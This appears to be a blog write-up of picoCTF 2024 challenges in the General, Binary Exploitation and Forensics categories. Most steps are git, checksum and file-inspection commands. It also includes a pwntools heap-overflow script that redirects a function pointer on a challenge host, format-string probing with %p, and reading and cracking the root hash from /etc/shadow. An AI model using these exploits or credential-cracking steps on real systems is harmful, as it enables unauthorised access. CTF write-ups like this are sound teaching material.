picoCTF 2024

First Post:

Last Update:

General

Super SSH

General

1
ssh ctf-player@titan.picoctf.net -p 63095

General

Commitment Issues

General

After unzipping, we have a message.txt file with the following message

General

We can run git log to see older commits

General

From this we know that the flag was created in the previous commit

We can change to that commit

1
git checkout 87b85d7dfb839b077678611280fa023d76e017b8

General

We can now see the flag inside message.txt

General

Time Machine

General

After unzipping and reading message.txt

General

The flag is in the git log

1
git log

General

Blame Game

General

The content of message.py is an unfinished command

General

If we run git log, we can see a huge list of commits

Send the output of the git log command to a .txt file

1
git log > output.txt

If we cat the output now, we can see the flag in the author name of one of the earliest commits

General

Collaborative Development

General

flag.py content

General

If we list all branches, we can see different branches, related to different parts

1
git branch -a

General

We can use git diff to see all the differences in the branches, and each part has a part of the flag

1
git diff feature/part-1 feature/part-2 feature/part-3

General

binhexa

General

In this challenge we need to answer a bunch of questions related to binary operations, the numbers are random every time
I used this binary calculator

General

General

In this challenge, the best strategy is to keep finding the median in between guesses

General

endianness

General

For this challenge I used a python script to convert ASCII to little and big endian, just change the input_string 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def ascii_to_little_endian(input_string):
    # Convert the input string to ASCII bytes
    ascii_bytes = input_string.encode('ascii')
    
    # Convert ASCII bytes to little endian hexadecimal representation
    little_endian_hex = ''.join(format(byte, '02x') for byte in reversed(ascii_bytes))
    
    return little_endian_hex

def ascii_to_big_endian(input_string):
    # Convert the input string to ASCII bytes
    ascii_bytes = input_string.encode('ascii')
    
    # Convert ASCII bytes to big endian hexadecimal representation
    big_endian_hex = ''.join(format(byte, '02x') for byte in ascii_bytes)
    
    return big_endian_hex

# Example usage for little endian:
input_string = "lopmo"
little_endian_hex = ascii_to_little_endian(input_string)
print("Little Endian Hexadecimal Representation:", little_endian_hex)

# Example usage for big endian:
big_endian_hex = ascii_to_big_endian(input_string)
print("Big Endian Hexadecimal Representation:", big_endian_hex)

General

dont-you-love-banners

General

We can use nc to see what information is leaking, and we can see a password

General

We can use this password to connect to the application

The other two questions are easily googled

General

We are now in a shell as the user player, and in it’s home directory we have a text file

General

We have access to the /root directory, but no permission to read flag.txt

General

However we have access to the /etc/shadow file

General

We can crack the root’s hash

General

General

Now just change user to root and cat the flag.txt

General

Binary Exploitation

format string 0

Binary

This one is very simple, we can spam the %p parameter

Binary

Binary

heap 0

Binary

For this challenge, in the source code, the check_win function just compares the safe_var variable to the string “bico”, if the safe_var variable is not equal to “bico” the code runs.
So we just need to overflow the stack until the safe_var variable is not equal to “bico”

We can just spam A’s and safe_var will be overwritten

Binary

Binary

Binary

heap 1

Binary

Looking at the source code, this is very similar to the previous challenge, however, this time the check_win() function will only run if safe_var is equal to “pico”

Binary

To find the point in which the safe_var starts being overwritten, I created a 50 character pattern

1
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50

Binary

With this pattern, we can see that safe_var starts being overwritten in 0Ab1

So we just need to replace 0Ab1Ab2Ab3Ab4Ab5Ab with “pico”

Binary

Now just use option 4 to print the flag

Binary

heap 2

Binary

This time the function check_win() dereferences a pointer (x), assumes that the value stored at that memory address is the address of a function

Binary

So we first need to find where x starts being overwritten, and then write the address of the win() function

Binary

Find where x starts being overwritten

Binary

x starts being overwritten after 32 chars

Then I used pwndbg to find the win() function address

Binary

The memory address for the win() function is 0x4011a0

Then I made a python script to send 32 chars, and then the memory address for the win() function

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

# Connect to the remote host and port
host = 'mimas.picoctf.net'
port = 61553
p = remote(host, port)

# Pause to allow time for the binary to start up
pause()

# Select option 2 to write to the buffer
p.sendline('2')

# Send the payload to trigger buffer overflow
payload = b"A" * 32 + b"\xa0\x11\x40"
p.sendline(payload)

# Select option 4 to print the flag
p.sendline('4')

# Receive and print the flag
print(p.recvuntil('}').decode())

Binary

Forensics

Scan Surprise

Forensics

After unzipping, we have a flag.png file that contains a QR code

Forensics

We just need to scan it for the flag

Forensics

Verify

Forensics

In this challenge, ssh into the machine and cat checksum.txt

Forensics

This is the sha256 checksum of the file we need to find

In the files directory we have a huge list of files

Forensics

We just need to check the sha256 hash of all the files, and grep the one we want from the checksum.txt

1
sha256sum * | grep "fba9f49bf22aa7188a155768ab0dfdc1f9b86c47976cd0f7c9003af2e20598f7"

Forensics

We now just run the decrypt.sh with this file

Forensics

CanYouSee

Forensics

For this challenge, we just have a .jpg file

The image gives us nothing

Forensics

I went to look for the magic bytes by using head, and ended up finding a base64 encoded string

1
cat ukn_reality.jpg | head

Forensics

We can just decode this

Forensics

Secret of the Polyglot

Forensics

In this challenge, we have a pdf file, and if we open it, we can see the second half of the flag

Forensics

If we look at the file’s magic bytes, we will find the PNG magic bytes

Forensics

Just change the extension to .png and open it

Forensics

We now have the first half of the flag too

Forensics

Mob psycho

Forensics

This challenge gives us an apk file
We can unzip apk files, after unzipping we are left with a lot of files to search through

Forensics

I ended up finding a flag.txt file

1
find . -type f -name "*flag*"

Forensics

Forensics

Convert from hex and we get the flag

Forensics